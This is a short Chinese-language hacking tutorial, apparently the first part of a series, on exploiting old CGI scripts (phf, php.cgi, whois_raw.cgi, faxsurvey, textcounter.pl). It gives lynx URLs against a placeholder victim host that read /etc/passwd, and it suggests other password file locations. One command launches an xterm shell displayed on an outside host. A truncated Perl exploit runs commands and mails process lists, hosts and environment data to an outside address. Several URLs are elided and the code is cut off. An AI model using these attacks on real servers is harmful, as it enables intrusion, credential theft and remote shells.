CGI漏洞

CGI漏洞(1)

一. phf漏洞
这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:

lynx http://www.victim.com/cgi-bin/ph ;... n/cat%20/etc/passwd

但是我们还能找到它吗?

二. PHP.cgi 2.0beta10或更早版本的漏洞
可以读nobody权限的所有文件.

lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在
/etc/master.passwd、/etc/security/passwd等.

三. whois_raw.cgi

lynx http://www.victim.com/cgi-bin/wh ;... 0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/wh ;... =%0A/usr/X11R6/bin/
xterm%20-display%20graziella.lame.org:0

四. faxsurvey

lynx http://www.victim.com/cgi-bin/faxsurvey?/b...t%20/etc/passwd

五. textcounter.pl
如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.

#!/usr/bin/perl
$URL=http://dtp.kappa.ro/a/test.shtml‘; # please _DO_ _modify_ this 
$EMAIL=‘pdoru@pop3.kappa.ro,root‘; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\mail ${EMAIL} -sanothere_one";